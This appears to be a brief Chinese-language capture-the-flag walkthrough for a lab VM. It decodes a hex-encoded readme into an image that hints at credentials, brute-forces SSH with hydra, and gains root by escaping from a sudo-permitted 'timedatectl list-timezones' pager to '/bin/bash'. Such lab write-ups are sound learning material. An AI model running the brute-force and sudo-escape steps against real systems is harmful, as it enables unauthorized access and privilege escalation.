信息收集
1.查看它的mac地址并将网络连接模式改成nat
2.主机发现
3.端口扫描
4.访问80端口
发现一些文件
5.查看readme.md 中是十六进制的值
6.将内容写入readme.md中,使用 xxd 转换
xxd -r -ps readme.md > readme.bin
cat readme.bin
发现是一张图片
7.将后缀修改为 jpg ,查看图片
8.一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh
getshell
1.使用 hydra 进行爆破
hydra -L 123.txt -P 369.txt ssh://192.168.42.192
2.ssh连接
ssh broken@192.168.42.192
提权
1.sudo提权
sudo -l
2.发现是all并发现timedatectl 可以执行root权限,执行命令
sudo timedatectl list-timezones
!/bin/bash